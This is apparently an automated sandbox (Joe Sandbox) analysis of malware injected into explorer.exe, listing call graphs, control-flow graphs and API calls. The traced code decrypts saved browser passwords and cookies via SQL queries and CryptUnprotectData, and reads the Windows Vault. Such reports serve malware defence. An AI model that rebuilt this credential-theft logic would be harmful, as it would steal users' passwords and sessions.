28471 2d61a28 RegQueryValueExW 28469->28471 28474 2d61ab9 28470->28474 28475 2d619e5 5 API calls 28470->28475 28472 2d61a46 28471->28472 28473 2d61a94 RegCloseKey 28471->28473 28472->28473 28481 2d61000 GetProcessHeap RtlAllocateHeap 28472->28481 28473->28470 28473->28474 28474->28414 28475->28474 28477 2d61a61 RegQueryValueExW 28478 2d61a7f 28477->28478 28479 2d61a8b 28477->28479 28478->28473 28480 2d61011 3 API calls 28479->28480 28480->28478 28481->28477 28482->28420 28483->28432 28485 2d61b6a 2 API calls 28484->28485 28486 2d63e0f 28485->28486 28497 2d63ec7 28486->28497 28501 2d61c31 CreateFileW 28486->28501 28492 2d63ebf 28494 2d61011 3 API calls 28492->28494 28494->28497 28495 2d63e6c RtlCompareMemory 28496 2d63ea8 28495->28496 28498 2d63e7e CryptUnprotectData 28495->28498 28499 2d61011 3 API calls 28496->28499 28497->28436 28498->28496 28499->28492 28500->28433 28502 2d61c53 GetFileSize 28501->28502 28503 2d61c98 28501->28503 28504 2d61c63 28502->28504 28505 2d61c90 CloseHandle 28502->28505 28503->28497 28511 2d62fb1 28503->28511 28523 2d61000 GetProcessHeap RtlAllocateHeap 28504->28523 28505->28503 28507 2d61c6b ReadFile 28508 2d61c80 28507->28508 28508->28505 28509 2d61011 3 API calls 28508->28509 28510 2d61c8e 28509->28510 28510->28505 28512 2d62ff2 28511->28512 28513 2d62fb8 StrStrIA 28511->28513 28512->28497 28517 2d6123b lstrlen 28512->28517 28513->28512 28514 2d62fcd lstrlen StrStrIA 28513->28514 28514->28512 28515 2d62fe7 28514->28515 28524 2d6190b 6 API calls 28515->28524 28518 2d61256 CryptStringToBinaryA 28517->28518 28519 2d6129b 28517->28519 28518->28519 28520 2d61272 28518->28520 28519->28492 28519->28495 28519->28496 28525 2d61000 GetProcessHeap RtlAllocateHeap 28520->28525 28522 2d6127e CryptStringToBinaryA 28522->28519 28523->28507 28524->28512 28525->28522 28526->28463 29254 2d6a558 18 API calls 29139 2d86340 92 API calls 29256 2d8e141 18 API calls 29140 2d7f74d 18 API calls 28903 2d62f77 28904 2d62e30 22 API calls 28903->28904 28905 2d62f9a 28904->28905 28906 2d62e30 22 API calls 28905->28906 28907 2d62fab 28906->28907 29259 2d7c97b memcpy 29261 2d95d6f 20 API calls 29262 2d7a16f 33 API calls 29143 2d97762 memset memset memcpy 29144 2d6ab68 22 API calls 29145 2d87f67 24 API calls 28194 2d63717 28244 2d61b6a 28194->28244 28196 2d63c23 28197 2d6372e 28197->28196 28250 2d61000 GetProcessHeap RtlAllocateHeap 28197->28250 28199 2d6376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28200 2d6379e 28199->28200 28201 2d637a8 28199->28201 28267 2d6349b 31 API calls 28200->28267 28251 2db4bec 28201->28251 28204 2d63c15 DeleteFileW 28262 2d61011 28204->28262 28206 2d637b3 28206->28204 28207 2d63c0c 28206->28207 28268 2d61000 GetProcessHeap RtlAllocateHeap 28206->28268 28278 2db3848 28207->28278 28210 2d637e3 28269 2d802ec 107 API calls 28210->28269 28213 2d63bd9 lstrlen 28214 2d63c05 28213->28214 28215 2d63be5 28213->28215 28217 2d61011 3 API calls 28214->28217 28275 2d61798 lstrlen 28215->28275 28217->28207 28218 2d63bf3 28276 2d61798 lstrlen 28218->28276 28219 2d63a37 CryptUnprotectData 28238 2d637ee 28219->28238 28220 2d63833 RtlCompareMemory 28220->28219 28220->28238 28223 2d63bfc 28277 2d61798 lstrlen 28223->28277 28224 2d63bcc 28274 2d7fb92 93 API calls 28224->28274 28226 2d63867 RtlZeroMemory 28270 2d61000 GetProcessHeap RtlAllocateHeap 28226->28270 28228 2d61fa7 19 API calls 28228->28238 28229 2d61011 3 API calls 28229->28238 28230 2d63b0f lstrlen 28231 2d63b21 lstrlen 28230->28231 28230->28238 28231->28238 28232 2d61000 GetProcessHeap RtlAllocateHeap 28232->28238 28233 2d63987 lstrlen 28236 2d63999 lstrlen 28233->28236 28233->28238 28235 2d63b66 wsprintfA lstrlen 28237 2d63ba3 lstrcat 28235->28237 28235->28238 28236->28238 28237->28238 28238->28219 28238->28220 28238->28224 28238->28226 28238->28228 28238->28229 28238->28230 28238->28232 28238->28233 28238->28237 28271 2d62112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28238->28271 28272 2d62112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28238->28272 28273 2d802ec 107 API calls 28238->28273 28240 2d639de wsprintfA lstrlen 28241 2d63a0d 28240->28241 28242 2d63a1b lstrcat 28240->28242 28241->28242 28243 2d61011 3 API calls 28242->28243 28243->28238 28245 2d61b6f 28244->28245 28246 2d61b99 28244->28246 28245->28246 28247 2d61b76 CreateFileW 28245->28247 28246->28197 28248 2d61b95 28247->28248 28249 2d61b8d CloseHandle 28247->28249 28248->28197 28249->28248 28250->28199 28281 2db307c 28251->28281 28253 2db4c01 28260 2db4c44 28253->28260 28291 2d7c54d memset 28253->28291 28255 2db4c18 28292 2d7c871 21 API calls 28255->28292 28257 2db4c2a 28293 2d7c518 19 API calls 28257->28293 28259 2db4c33 28259->28260 28294 2db486f 89 API calls 28259->28294 28260->28206 28316 2d61162 VirtualQuery 28262->28316 28265 2d6102d 28265->28196 28266 2d6101d GetProcessHeap RtlFreeHeap 28266->28265 28267->28201 28268->28210 28269->28238 28270->28238 28271->28240 28272->28235 28273->28238 28274->28213 28275->28218 28276->28223 28277->28214 28318 2db37cb 28278->28318 28282 2db3095 28281->28282 28285 2db308e 28281->28285 28283 2db30ad 28282->28283 28308 2d666ce 17 API calls 28282->28308 28283->28285 28286 2db30ed memset 28283->28286 28285->28253 28287 2db3108 28286->28287 28288 2db3116 28287->28288 28309 2d6c59d 17 API calls 28287->28309 28288->28285 28295 2d66512 28288->28295 28291->28255 28292->28257 28293->28259 28294->28260 28310 2d6685c 28295->28310 28297 2d6651d 28297->28285 28298 2d66519 28298->28297 28299 2d6bfec GetSystemInfo 28298->28299 28313 2d665bd 28299->28313 28301 2d6c00e 28302 2d665bd 16 API calls 28301->28302 28303 2d6c01a 28302->28303 28304 2d665bd 16 API calls 28303->28304 28305 2d6c026 28304->28305 28306 2d665bd 16 API calls 28305->28306 28307 2d6c032 28306->28307 28307->28285 28308->28283 28309->28288 28311 2db307c 17 API calls 28310->28311 28312 2d66861 28311->28312 28312->28298 28314 2db307c 17 API calls 28313->28314 28315 2d665c2 28314->28315 28315->28301 28317 2d61019 28316->28317 28317->28265 28317->28266 28319 2db37d6 28318->28319 28329 2db37e9 28318->28329 28330 2d695b5 17 API calls 28319->28330 28321 2db37db 28322 2db37df 28321->28322 28324 2db37eb 28321->28324 28331 2db4da0 17 API calls 28322->28331 28325 2db3834 28324->28325 28327 2db381f 28324->28327 28333 2db3865 71 API calls 28325->28333 28332 2d68795 22 API calls 28327->28332 28329->28204 28330->28321 28331->28329 28332->28329 28333->28329 28334 2d62b15 28359 2d61953 28334->28359 28336 2d62b1f FindFirstFileW 28338 2d62c5c 28336->28338 28346 2d62b4e 28336->28346 28339 2d61011 3 API calls 28338->28339 28340 2d62c63 28339->28340 28344 2d61011 3 API calls 28340->28344 28341 2d62b59 lstrcmpiW 28342 2d62b71 lstrcmpiW 28341->28342 28343 2d62c3d FindNextFileW 28341->28343 28342->28343 28342->28346 28343->28346 28347 2d62c51 FindClose 28343->28347 28348 2d62c6a 28344->28348 28345 2d61953 6 API calls 28345->28346 28346->28341 28346->28345 28349 2d6199d 9 API calls 28346->28349 28358 2d61011 3 API calls 28346->28358 28364 2d619b4 28346->28364 28368 2d6199d 28346->28368 28347->28338 28351 2d62bdf StrStrIW 28349->28351 28352 2d62c10 StrStrIW 28351->28352 28355 2d62bf1 28351->28355 28352->28355 28353 2d61cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 28353->28355 28354 2d61011 3 API calls 28354->28343 28355->28352 28355->28353 28355->28354 28373 2d6278e 41 API calls 28355->28373 28358->28346 28360 2d61964 lstrlenW lstrlenW 28359->28360 28374 2d61000 GetProcessHeap RtlAllocateHeap 28360->28374 28363 2d61986 lstrcatW lstrcatW 28363->28336 28365 2d619bc 28364->28365 28367 2d619d4 28364->28367 28366 2d619c3 lstrlenW 28365->28366 28365->28367 28366->28367 28367->28346 28369 2d61953 6 API calls 28368->28369 28370 2d619a6 28369->28370 28371 2d61011 3 API calls 28370->28371 28372 2d619af 28371->28372 28372->28346 28373->28352 28374->28363 29147 2d813ca 105 API calls 29264 2d784a7 30 API calls 29148 2d86b14 memset memcpy _allmul 28738 2d6411b 28739 2d64045 50 API calls 28738->28739 28740 2d6412b 28739->28740 28741 2d64045 50 API calls 28740->28741 28742 2d6413b 28741->28742 29149 2d85f08 113 API calls 29270 2d76d01 _allmul 28869 2dc9304 28870 2dc9344 28869->28870 28871 2dc94da LoadLibraryA 28870->28871 28874 2dc9584 28870->28874 28876 2dc951f VirtualProtect VirtualProtect 28870->28876 28872 2dc94f1 28871->28872 28872->28870 28875 2dc9503 GetProcAddress 28872->28875 28874->28874 28875->28872 28877 2dc9519 28875->28877 28876->28874 28900 2d64108 28901 2d64045 50 API calls 28900->28901 28902 2d64118 28901->28902 29152 2d96f06 24 API calls 29271 2d79534 39 API calls 29155 2d7ff32 21 API calls 29272 2d8f130 22 API calls 29156 2d70f3e 60 API calls 29157 2d77b3d 18 API calls 29275 2d69925 18 API calls 29160 2d9072d 19 API calls 29162 2dac322 27 API calls 29163 2d6cb2a _allmul _allmul 29276 2d70128 36 API calls

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 2d63717-2d63730 call 2d61b6a 3 2d63736-2d6374c 0->3 4 2d63c37-2d63c3d 0->4 5 2d63762-2d6379c call 2d61000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 3->5 6 2d6374e-2d6375e call 2d6302d 3->6 11 2d6379e-2d637a3 call 2d6349b 5->11 12 2d637a8-2d637b5 call 2db4bec 5->12 6->5 11->12 16 2d63c15-2d63c1e DeleteFileW call 2d61011 12->16 17 2d637bb-2d637d3 call 2d9eeb8 12->17 21 2d63c23-2d63c28 16->21 22 2d63c0c-2d63c10 call 2db3848 17->22 23 2d637d9-2d637f1 call 2d61000 call 2d802ec 17->23 21->4 24 2d63c2a-2d63c32 call 2d62ffa 21->24 22->16 31 2d637f7 23->31 32 2d63bd0-2d63be3 call 2d7fb92 lstrlen 23->32 24->4 34 2d637fc-2d63816 call 2d61fa7 31->34 37 2d63c05-2d63c07 call 2d61011 32->37 38 2d63be5-2d63c00 call 2d61798 * 3 32->38 41 2d63bb6-2d63bc6 call 2d802ec 34->41 42 2d6381c-2d6382d 34->42 37->22 38->37 41->34 55 2d63bcc 41->55 45 2d63a37-2d63a51 CryptUnprotectData 42->45 46 2d63833-2d63843 RtlCompareMemory 42->46 45->41 48 2d63a57-2d63a5c 45->48 46->45 50 2d63849-2d6384b 46->50 48->41 52 2d63a62-2d63a78 call 2d61fa7 48->52 50->45 54 2d63851-2d63856 50->54 61 2d63a86-2d63a9d call 2d61fa7 52->61 62 2d63a7a-2d63a80 52->62 54->45 58 2d6385c-2d63861 54->58 55->32 58->45 60 2d63867-2d638ed RtlZeroMemory call 2d61000 58->60 72 2d638f3-2d63909 call 2d61fa7 60->72 73 2d63a2e-2d63a32 60->73 68 2d63a9f-2d63aa5 61->68 69 2d63aab-2d63ac2 call 2d61fa7 61->69 62->61 64 2d63a82 62->64 64->61 68->69 74 2d63aa7 68->74 78 2d63ac4-2d63aca 69->78 79 2d63ad0-2d63aed call 2d61fa7 69->79 83 2d63917-2d6392d call 2d61fa7 72->83 84 2d6390b-2d63911 72->84 77 2d63bb1 call 2d61011 73->77 74->69 77->41 78->79 82 2d63acc 78->82 90 2d63af7-2d63b01 79->90 91 2d63aef-2d63af1 79->91 82->79 92 2d6392f-2d63935 83->92 93 2d6393b-2d63952 call 2d61fa7 83->93 84->83 86 2d63913 84->86 86->83 95 2d63b03-2d63b05 90->95 96 2d63b0f-2d63b1b lstrlen 90->96 91->90 94 2d63af3 91->94 92->93 97 2d63937 92->97 103 2d63954-2d6395a 93->103 104 2d63960-2d63979 call 2d61fa7 93->104 94->90 95->96 99 2d63b07-2d63b0b 95->99 96->41 100 2d63b21-2d63b2a lstrlen 96->100 97->93 99->96 100->41 102 2d63b30-2d63b4f call 2d61000 100->102 110 2d63b51 102->110 111 2d63b59-2d63b93 call 2d62112 wsprintfA lstrlen 102->111 103->104 108 2d6395c 103->108 112 2d63987-2d63993 lstrlen 104->112 113 2d6397b-2d63981 104->113 108->104 110->111 118 2d63b95-2d63ba1 call 2d6102f 111->118 119 2d63ba3-2d63baf lstrcat 111->119 112->73 117 2d63999-2d639a2 lstrlen 112->117 113->112 115 2d63983 113->115 115->112 117->73 120 2d639a8-2d639c7 call 2d61000 117->120 118->119 119->77 125 2d639d1-2d63a0b call 2d62112 wsprintfA lstrlen 120->125 126 2d639c9 120->126 129 2d63a0d-2d63a19 call 2d6102f 125->129 130 2d63a1b-2d63a29 lstrcat call 2d61011 125->130 126->125 129->130 130->73
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D61B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02D62893,00000000,00000000,00000000,?), ref: 02D61B82
                                                                                                                                                                                                                                • Part of subcall function 02D61B6A: CloseHandle.KERNELBASE(00000000), ref: 02D61B8F
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,00000000), ref: 02D63778
                                                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 02D63782
                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 02D63789
                                                                                                                                                                                                                              • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 02D63794
                                                                                                                                                                                                                              • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 02D6383B
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,00000040), ref: 02D63870
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?), ref: 02D6398B
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02D6399A
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02D639F1
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 02D639FD
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02D63A21
                                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02D63A49
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02D63B13
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02D63B22
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02D63B79
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02D63B85
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02D63BA9
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 02D63BDA
                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02D63C16
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                                                                                                                              • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                                                                                                                                                                                              • API String ID: 584740257-404540950
                                                                                                                                                                                                                              • Opcode ID: f77b9fefe34fca29670dce09ea2ae3f1c2f06e863178c85e474fb6fdf9d3b032
                                                                                                                                                                                                                              • Instruction ID: 403453e96668c4baebfa82cc84e5de04f4a7e0ef89f64967b5224452a7d228b2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f77b9fefe34fca29670dce09ea2ae3f1c2f06e863178c85e474fb6fdf9d3b032
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3E15871608341AFD755DF24C898A3BBBEAEF85B44F04486DF98596390DB35CC05CBA2

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 134 2d62198-2d621c9 RtlZeroMemory GetVersionExW 135 2d621d7-2d621dc 134->135 136 2d621cb-2d621d0 134->136 138 2d621de 135->138 139 2d621e3-2d621f6 LoadLibraryW 135->139 137 2d621d2 136->137 136->138 137->135 138->139 140 2d621fc-2d6223e GetProcAddress * 5 139->140 141 2d6249b-2d624a3 139->141 142 2d62244-2d6224a 140->142 143 2d62492-2d6249a FreeLibrary 140->143 142->143 144 2d62250-2d62252 142->144 143->141 144->143 145 2d62258-2d6225a 144->145 145->143 146 2d62260-2d62265 145->146 146->143 147 2d6226b-2d62277 146->147 148 2d6227e-2d62280 147->148 148->143 149 2d62286-2d622a5 148->149 151 2d6248b-2d6248f 149->151 152 2d622ab-2d622b3 149->152 151->143 153 2d62483 152->153 154 2d622b9-2d622c5 152->154 153->151 155 2d622c9-2d622db 154->155 156 2d62365-2d62375 RtlCompareMemory 155->156 157 2d622e1-2d622f1 RtlCompareMemory 155->157 158 2d62452-2d62475 156->158 159 2d6237b-2d623c9 call 2d61953 * 3 156->159 157->158 160 2d622f7-2d62348 call 2d61953 * 3 157->160 158->155 163 2d6247b-2d6247f 158->163 176 2d623e4-2d623ea 159->176 177 2d623cb-2d623dc call 2d61953 159->177 160->176 178 2d6234e-2d62363 call 2d61953 160->178 163->153 180 2d62431-2d62433 176->180 181 2d623ec-2d623ee 176->181 190 2d623e0 177->190 178->190 183 2d62435-2d62437 call 2d61011 180->183 184 2d6243c-2d6243e 180->184 186 2d623f0-2d623f2 181->186 187 2d6242a-2d6242c call 2d61011 181->187 183->184 191 2d62447-2d62449 184->191 192 2d62440-2d62442 call 2d61011 184->192 186->187 193 2d623f4-2d623f6 186->193 187->180 190->176 191->158 197 2d6244b-2d6244d call 2d61011 191->197 192->191 193->187 196 2d623f8-2d62406 StrStrIW 193->196 198 2d62426 196->198 199 2d62408-2d62421 call 2d617c0 * 3 196->199 197->158 198->187 199->198
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,00000114), ref: 02D621AF
                                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 02D621BE
                                                                                                                                                                                                                              • LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 02D621E8
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 02D6220A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 02D62214
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 02D62220
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 02D6222A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 02D62236
                                                                                                                                                                                                                              • RtlCompareMemory.NTDLL(?,02DC1110,00000010), ref: 02D622E8
                                                                                                                                                                                                                              • RtlCompareMemory.NTDLL(?,02DC1110,00000010), ref: 02D6236C
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02D62F0C), ref: 02D61973
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrlenW.KERNEL32(02DB6564,?,?,02D62F0C), ref: 02D61978
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,?,?,?,02D62F0C), ref: 02D61990
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,02DB6564,?,?,02D62F0C), ref: 02D61994
                                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 02D623FE
                                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 02D62493
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                                                                                                                                                                                              • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                                                                                                                                              • API String ID: 2583887280-2831467701
                                                                                                                                                                                                                              • Opcode ID: 627f2a9d7353eafd653dfae6b6b6f4653cc9ca271a7c28b7937151e3fab23a01
                                                                                                                                                                                                                              • Instruction ID: 28601e89ff5e160249999d1868901ab2242314df0e2a1b100da75b3ed589cf56
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 627f2a9d7353eafd653dfae6b6b6f4653cc9ca271a7c28b7937151e3fab23a01
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24915B71A083459FD714DF65C858A2BBBEAEF98704F00482EF99597350EB70ED05CB92

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 261 2d63098-2d630b1 call 2d61b6a 264 2d630b7-2d630cd 261->264 265 2d633ba-2d633c0 261->265 266 2d630e3-2d63128 call 2d61000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 2db4bec 264->266 267 2d630cf-2d630d8 call 2d6302d 264->267 274 2d6312e-2d63146 call 2d9eeb8 266->274 275 2d6339b-2d633a4 DeleteFileW call 2d61011 266->275 271 2d630dd-2d630df 267->271 271->266 280 2d63392-2d63396 call 2db3848 274->280 281 2d6314c-2d63158 call 2d802ec 274->281 279 2d633a9-2d633ab 275->279 279->265 282 2d633ad-2d633b5 call 2d62ffa 279->282 280->275 287 2d6315e-2d63161 281->287 288 2d63389-2d6338d call 2d7fb92 281->288 282->265 290 2d63165-2d6317f call 2d61fa7 287->290 288->280 293 2d63185-2d63196 290->293 294 2d6336f-2d6337b call 2d802ec 290->294 296 2d6319c-2d631ac RtlCompareMemory 293->296 297 2d632cd-2d632e7 CryptUnprotectData 293->297 294->290 302 2d63381-2d63385 294->302 296->297 300 2d631b2-2d631b4 296->300 297->294 299 2d632ed-2d632f2 297->299 299->294 303 2d632f4-2d6330a call 2d61fa7 299->303 300->297 301 2d631ba-2d631bf 300->301 301->297 304 2d631c5-2d631ca 301->304 302->288 308 2d6330c-2d63312 303->308 309 2d63318-2d6332f call 2d61fa7 303->309 304->297 307 2d631d0-2d63253 RtlZeroMemory call 2d61000 304->307 319 2d63255-2d6326b call 2d61fa7 307->319 320 2d632bd 307->320 308->309 311 2d63314 308->311 315 2d63331-2d63337 309->315 316 2d6333d-2d63343 309->316 311->309 315->316 318 2d63339 315->318 321 2d63345-2d6334b 316->321 322 2d63351-2d6336a call 2d61798 * 3 316->322 318->316 330 2d6326d-2d63273 319->330 331 2d63279-2d6328e call 2d61fa7 319->331 324 2d632c1-2d632c8 call 2d61011 320->324 321->322 325 2d6334d 321->325 322->294 324->294 325->322 330->331 334 2d63275 330->334 339 2d63290-2d63296 331->339 340 2d6329c-2d632bb call 2d61798 * 3 331->340 334->331 339->340 341 2d63298 339->341 340->324 341->340
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D61B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02D62893,00000000,00000000,00000000,?), ref: 02D61B82
                                                                                                                                                                                                                                • Part of subcall function 02D61B6A: CloseHandle.KERNELBASE(00000000), ref: 02D61B8F
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,00000000), ref: 02D630F9
                                                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 02D63103
                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 02D6310A
                                                                                                                                                                                                                              • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 02D63115
                                                                                                                                                                                                                              • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 02D631A4
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,00000040), ref: 02D631D7
                                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02D632DF
                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02D6339C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                                                                                                                              • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                                                                                                                                                                              • API String ID: 2757140130-4052020286
                                                                                                                                                                                                                              • Opcode ID: 33bb10fc5dbfcd71a24e05d05cdcd00a564fa351ec4e1d5804cf44f807a42649
                                                                                                                                                                                                                              • Instruction ID: d45a50cfaa00e529fbf22ffdb5cad3e59ec538399ba06cffd081b60d73b0ef04
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33bb10fc5dbfcd71a24e05d05cdcd00a564fa351ec4e1d5804cf44f807a42649
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25917871608341ABD7519F65C848A3FBBEAEFC9B48F04492DF58596390DB35DC04CB62

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
                                                                                                                                                                                                                                • Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A
                                                                                                                                                                                                                              • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 02D63F0A
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 02D63F16
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,02DB62CC), ref: 02D63F38
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,02DB62D0), ref: 02D63F4C
                                                                                                                                                                                                                              • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 02D63F69
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,Local State), ref: 02D63F7E
                                                                                                                                                                                                                              • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 02D63F9B
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02D63FB5
                                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 02D63FC4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                                                                                                                                                                              • String ID: *.*$Local State
                                                                                                                                                                                                                              • API String ID: 3923353463-3324723383
                                                                                                                                                                                                                              • Opcode ID: 0c1cf954b53474b8d713db752281e74a727dbe35c159ff0931f895c41361b2cb
                                                                                                                                                                                                                              • Instruction ID: 276a63fbb1bb60b3991b2282dba7dd4371fad9a99700f9e8d615ddaad77d0e4d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c1cf954b53474b8d713db752281e74a727dbe35c159ff0931f895c41361b2cb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9821CF30644245EFEB91AA709C2CA7B77BDDF81A45F140929F802C2381DB78CC188AB1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02D62F0C), ref: 02D61973
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrlenW.KERNEL32(02DB6564,?,?,02D62F0C), ref: 02D61978
                                                                                                                                                                                                                                • Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,?,?,?,02D62F0C), ref: 02D61990
